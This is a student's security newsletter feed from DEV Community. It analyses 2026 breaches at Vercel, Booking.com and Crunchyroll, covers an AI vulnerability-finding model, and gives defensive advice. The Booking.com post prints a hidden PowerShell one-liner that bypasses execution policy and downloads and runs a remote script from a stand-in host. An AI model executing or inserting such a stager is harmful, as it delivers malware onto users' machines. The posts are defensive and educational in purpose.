DEV Community: Bulut Caner

The $2 Million Permission You Forgot You Granted

Bulut Caner — Mon, 18 May 2026 08:49:27 +0000

At some point you clicked login with Google or another account on a third-party app because it was faster and it was the easiest way to get what you wanted from the site. You clicked and forgot about it. Well, so did a Vercel employee. That single click is exactly how threat actors walked straight in one of the most widely recognized cloud platforms on the internet on April 2026. The attackers accessed internal environment variables (dynamically set value that is used throughout a program and determines properties of a program on each device) and came back demanding $2 million. This was solely possible because of a forgotten permission and a chain of connections which was not so on the foreground. Here’s the plot.
Press enter or click to view image in full size

More about Vercel
Vercel is an American cloud application company that specializes in providing developer tools and infrastructure for building, deploying, and maintaining websites. It is particularly known for its creation and optimization of the Next.js framework, which is widely used for React applications. It is optimized for Next.js but it also supports other frameworks such as Django and Flask. This breach specifically did not compromise Vercel’s customer side encryption but it exposed the internal environment variables, which should not have been open to the outside. The breach mainly has to do with OAuth permissions, so OAuth is the protocol behind every “login with Slack” or “connect with GitHub” button we normally click. When we authorize a third party app, we issue it with a token (a temporary access key) that lets it act for you together with whatever permission you allowed. Now, the problem here is that most people usually click “allow all” which hands you the main body key to your account. Once the connection is activated and given permission, it just sits there trusted by every system it comes into contact with. These integrations are given broad permissions because companies tend to think functionality is more important than security. After connecting, they forget about them and never audit what data these apps have access to.
The Vercel breach is not the first time this exact mechanism caused a big problem. In August 2025 a threat actor called UNC6395 used stolen OAuth tokens from Drifts Salesforce integration where they accessed customer environments across more than 700 organizations. This was done without any exploit or phishing involved. The same method was used, but with different companies.

How Did The Breach Start In The Beginning?
The Vercel breach did not start at Vercel though. It actually started a lot earlier at an AI company. This is a small startup that most people do not know about. The Vercel breach then moved from this artificial intelligence company to other places through a chain of people and companies that everyone trusted. Back in February 2026, an employee of Context.ai (an enterprise AI productivity tool, part of the growing category of “AI Office Suite” products that plug into your Google Workspace) was infected with Lumma Stealer malware. Lumma Stealer is an information-stealing malware. It specializes in stealing sensitive data such as browser information or cryptocurrency wallet details. The infected employee was a core member of the startup team with direct access to important administrative endpoints including the environment variable settings and production logs that made it more vulnerable for stealing of critical information.

Hudson Rock’s intelligence analysis found out that the employee had been downloading Roblox “auto-farm” scripts and executors. This is an efficient delivery vector for malware such as this Lumma Stealer.

Not Your Usual Password Stealer
Lumma is a session vacuum meaning it does not need your password to steal you active browser cookies, tokens that tell websites “this guy is already logged in, trust them”. It bypasses MFA entirely. The threat actors are thus not logging in as you but resuming your ongoing session at a website. This is not an advanced malware used by governments. Infostealers such as Lumma are a type of malware that can be bought and used by anyone running around fifty dollars per month which is actually cheaper than software subscriptions. In the first half of 2025 these infostealers stole, over two hundred seventy thousand Slack login details. (Engaging in the purchase, distribution, or use of malware is illegal and carries severe criminal penalties. This information is provided for educational purposes to help security professionals and organizations defend against these evolving threats.)

The Threat Actors:
A threat actor using the ShinyHunters persona notified that they were responsible for the attack via Telegram and BreachForums. They claimed to have stolen access keys, source code and other valuable information and demanded $2 million in return. Vercel confirmed the breach publicly and said that it affected a limited group of customer information. They notified law enforcement, checked with GitHub, Microsoft, npm and Socket to make sure none of the packages on npm were compromised.

Important: Vercel also published a specific OAuth Client ID as an indicator of compromise:
110671459871-30f1spbu0hptbs60cb4vsmv79i7bbvqj.apps.googleusercontent.com

Google Workspace admins should check their API Controls console for this immediately.

Two Things to Do For Businesses Before You Close This Tab:

Go to myaccount.google.com/permissions. Every app listed has some level of access to your Google account. Check these thoroughly and disable permissions if not in use. Also, review activity log for any suspicious or unrecognized activity. Attackers no longer need to deploy detectable payloads. They use OAuth tokens and API keys and service accounts to access secure systems which makes their actions appear like regular business operations. Traditional perimeter defenses and endpoint detection systems fail to detect adversaries who operate with real credentials through authentic system connections.
The Only Best Conclusion

The Vercel breach will be described in three ways it represents a supply chain attack and an OAuth failure and an infostealer incident. All of those framings are correct. But the simplest framing is this: someone granted a permission, forgot about it, and that forgotten permission became a $2 million problem.
You need to check your permissions at this moment instead of waiting until next week.

The Zero-Day Factory: Anthropic’s ‘Mythos’ and the End of Code Security

Bulut Caner — Mon, 18 May 2026 08:46:08 +0000

On April 7th, 2026, there was a remarkable shift within the digital world. Anthropic released a warning flag disguised as a language model. The tech world expected a better assistant however, we received Claude Mythos Preview instead. Anthropic’s own technical blog states Mythos was able to discover vulnerabilities but it doesn’t autonomously weaponize them. To play it safe, Anthropic has kept it behind a defensive alliance of theirs that is also known as “Project Glasswing”

While previous large language models rely on pattern recognition to generate answers and make fixes, Mythos analyzes the deep logic system of unsafe, vulnerable code to then identify failures within the structure. Analysts estimate that these zero-day chains currently cost around $2000 in computing.
Press enter or click to view image in full size

The most chilling angle of this Mythos announcement comes with its abilities for identifying ancient repositories in order to find vulnerabilities that have haunted humans for a long time. For example, Mythos identified a 27-year-old critical flaw in OpenBSD and a 16-year-old vulnerability in FFmpeg within hours of initialization. These bugs survived decades of expert audits and automated fuzzing, proving that our infrastructure has been ‘un-scanned’ rather than ‘secure’.

# Representation only — simplified CVSS v3.1 base score calculation
# This mirrors the severity class of vulnerabilities Mythos identified:
# network-accessible, no privileges required, high impact across C, I, A

impact = 1 - ((1 - 0.56) * (1 - 0.56) * (1 - 0.56))  # High confidentiality, integrity, availability impact
exploitability = 8.22 * 0.85 * 0.77 * 0.85 * 0.85     # Network vector, low complexity, no privileges, no user interaction
base_score = round(min(impact * 6.42 + exploitability, 10) * 10) / 10

print(f"CVSS v3.1 Base Score: {base_score}")  # Output: 9.8 — Critical

We have relied on the limitations of human assistance to keep our systems standing, Mythos doesn't have such limitations. Anthropic knew their creation was very powerful and could cause a lot of problems. So they put Mythos inside Project Glasswing, which is a group that includes the US Treasury, the UK AI Security Institute and big companies like Apple and Microsoft. Anthropic is providing massive compute credits to open-source maintainers to run the largest patching spree within the history of humans. Only certain people are allowed to use Mythos and is thus strictly vetted. It is currently a tool that is kept in a place and only utilized to help defense, the Blue Team before someone else gets a hold of something similar, to Mythos. The arrival of Mythos shows us a sad truth: attacks can now be automated. This means we are living in a time where the developers and builders have to stay one step ahead of threat actors who have potential to compromise. Developers have to be right all the time even when they are looking at millions and millions of lines of code. On the other hand the threat actors only need to find one little mistake in some old code from the 1990s to cause big problems for a whole network.

In contrast to the whole article, Mythos is better understood as a digital immune system rather than a mere weapon. I strongly believe it should shift our perspective from fear to fortification. We should not be scared of Mythos. It is actually a thing because it moves really fast. The cybersecurity professionals use Mythos to find and fix problems before the attackers can even find them. (At least for now) Relying solely on Artificial Intelligence, for defense is not a good idea. This is because it creates one spot that does not have human instinct and ethical supervision. These systems that work on their own are very fast. However they can be fooled by examples that are designed to confuse the Artificial Intelligence system. We still need humans to make sure Artificial Intelligence systems are working correctly.

Booking.com Got Breached. Your Reservation Was the Weapon.

Bulut Caner — Mon, 20 Apr 2026 11:05:18 +0000

In april 13th 2026, online travel agency booking.com issued a major notification that echoed back to 2021. There was unauthorized access to customer PII(Personally Identifiable Information). After the breach, their Public Relations team immediately stated that financial information was not accessed by the threat actors.

The breach most likely did not hit Booking.com’s core servers, but in fact it hit their Supply Chain. The supply chain in this case, refers to the network of partner hotels with a connection to Booking.com. If the hackers can’t or choose not to hack the “big bank” they choose to go to its local branches. The threat actos likely used a tactic called ClickFix where they might have tricked the hotel staff into running a malicious script under the guise of “fixing” a browser error that later on steals their session cookies.Session cookies are the digital ID within your browser that has the function of keeping you logged in. When a hacker steals this, they automatically bypass the need for password and Multi-Factor Authentication completely. To know how malware gets into a system we need to look at a stager. A stager is a small piece of code and its job is to download a malicious payload. The stager is like a delivery tool, for the harmful code. The malware is thus the harmful code that the stager downloads.

Disclaimer: The following code is purely for representation and provided with the intention of educational display.

# CONCEPTUAL REPRESENTATION ONLY — educational purposes
# Modern EDR/AMSI solutions would flag and block this immediately.

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')"
-ExecutionPolicy Bypass: Tells the system to ignore local script restrictions.

iex (Invoke-Expression): A common "red flag" command that runs downloaded code directly in the computer's memory.
Although only non-financial data was breached, it is still dangerous and is a major threat. Attackers can take the stolen PII and use it to make up a lie that can seem impossible to ignore. Because the threat actor knows your check in date, hotel name and more information about the registration, you believe the message is actually real.


{
  "guest_name": "Jane Smith",
  "booking_ref": "BK-99210",
  "check_in": "2026-05-14",
  "hotel_name": "Seaside Resort"
}

The message can look something like this: “Hi Jane, your booking BK-99210 for May 14th is at risk. Please verify your payment over here so we can save your booking details.”

Booking.com had a similar breach to this back in 2021 and it was fined €475,000 under The General Data Protection Regulation. Which is a European law which can hit many companies with massive fines if they manage to lose customer/user data.

You do not have to be a tech giant such as Booking.com to be taken as a target. Small businesses are often and have been used in the past as a bridge to leap over to bigger targets or their customer’s wallets. As you could see, this breach was not considered to be high tech but more of a simple one. The humans were the ones exploited along with the companies data systems. The manner to tackle such session hijacking and supply chain vulnerabilities can consist of many measures. First of all you can ensure that your web applications support Device Bound Session Credentials (DBSC). DBSC cryptographically binds a session to the device’s “Trusted Platform Module” When an attacker tries to exfiltrate the cookie to another machine, the session becomes invalid, so the private key never leaves the original set hardware. Another good measure could be enabling PowerShell Constrained Language Mode where you block -ExecutionPolicy Bypass flag for non admin users.

A good take from this breach could be, if you wait for the attack to develop before you secure your systems and partners, you have already lost the battle. Defense must begin also when everything is silent.

When Third Party Support Becomes Your Weakest Point: April 2026 Security Breach

Bulut Caner — Thu, 16 Apr 2026 12:56:14 +0000

On March 12 2026 threat actors got into Crunchyrolls support system by putting malware on a Telus International support agents computer. Stole their login details. With one login they could get into many internal systems like Zendesk, Gmail, Slack and Jira.
The attackers main goal was Crunchyrolls support system, Zendesk. This software helps manage customer requests in one place. Within 24 hours they downloaded 8 million support tickets. These tickets contained information such as customer names, emails, IP addresses and locations.

The attackers demanded $5 million. When Crunchyroll didn’t pay they leaked the data on April 4. Companies that do work for others like BPOs are major targets. If one employees computer gets compromised the bad actors can get into companies at once. Crunchyroll’s systems lacked basic defenses such as no API rate limiting, no anomaly detection but also no real-time monitoring. What would save or somewhat made this breach less worse, would be blocking bulk downloads, flag unusual access patterns, hardware multi factor authentication as well as network segmentation. This is not new either. Discord, Marks & Spencer, Co-op, and others have been hit the same way. Therefore until companies audit BPO permissions and implement zero-trust controls, expect more breaches.

There was probably no reason for a support agent to have full access to Jira, Slack, Gmail and Zendesk at the same time. This suggests that the company failed to control who had access to what giving agents access than they needed for their job. Beyond password theft the hackers likely used malware to steal session cookies. These cookies let attackers pretend to be logged in bypassing -factor authentication. The damage goes beyond the initial $5 million ransom demand. With eight million tickets leaked the risk now is that attackers will use this information to send emails to trick users into giving away credit card details or login credentials. For the company that was breached the fallout is huge showing a failure in endpoint security that allowed malware to persist undetected.

To prevent these kinds of attacks companies need to change how they think about security. They need to move from trusting vendors and toward a Zero Trust system. This starts with giving access to the specific application needed for a task. If an agent is working in Zendesk they should not be able to see the Jira login page. Companies should also require hardware-based -factor authentication, like physical security keys. These devices are much harder to hack than SMS or app-based codes. Data loss prevention must also be reinforced with API rate limiting and behavioral monitoring. The fact that millions of tickets were downloaded within a single day points to a lack of checks in the system. Security protocols should limit the number of records a single user can pull in a timeframe.
For sensitive roles companies can eliminate the risk of local device compromise by using Virtual Desktop Infrastructure (VDI) or managed enterprise browsers. In a VDI environment the agent logs into a machine managed by the parent company ensuring that no data lives on the agent’s hardware.
Finally security must be treated as an contractual obligation, not just a technical one. Organizations must implement third-party audits and “right-to-audit” clauses that allow for unannounced security scans of a vendor’s endpoint hygiene. Service Level Agreements should include financial penalties if a breach results from a vendor’s failure to maintain basic defenses. By treating BPO employees as high-risk users and wrapping their access, in these layers of friction companies can prioritize data safety.

Why a High School Student is Covering Defensive Cybersecurity

Bulut Caner — Thu, 16 Apr 2026 12:47:19 +0000

I’m 16. I recently started discovering cybersecurity purely out of curiosity. To see what it’s like, protecting yourself and others from cybercriminals before it becomes a bigger problem within society. As I delved deeper into this field the more I saw that I needed to learn more, to fully comprehend how computers communicate, before understanding how they’re exploited.

About me: In two years I would like to study cybersecurity & cybercrime at a university. This newsletter will be me documenting multiple aspects of cybersecurity to document how breaches happen globally and what we can learn from them. Many angles will be discovered such as defensive security analysis, the attack prevention measures of organizations, what went wrong and how it could possibly have been prevented. I am currently the Head of Technics of our MUN organization, where I built and deployed a website from scratch. Within the process I learned web design, web development and DNS configuration of our custom domain.

Defense Stack, The Security Analysis Newsletter by a highschool student: The first posts will break down recent cybersecurity breaches, what happened, how attackers got in, as well as what defensive measures could help stopping it. If you’re curious about cybersecurity, learning alongside me, or just want to understand what’s happening in the digital threat landscape, you may want to join me. This will be a long journey and I am going to extract as much information as I can.

— First Publication of Defense Stack >_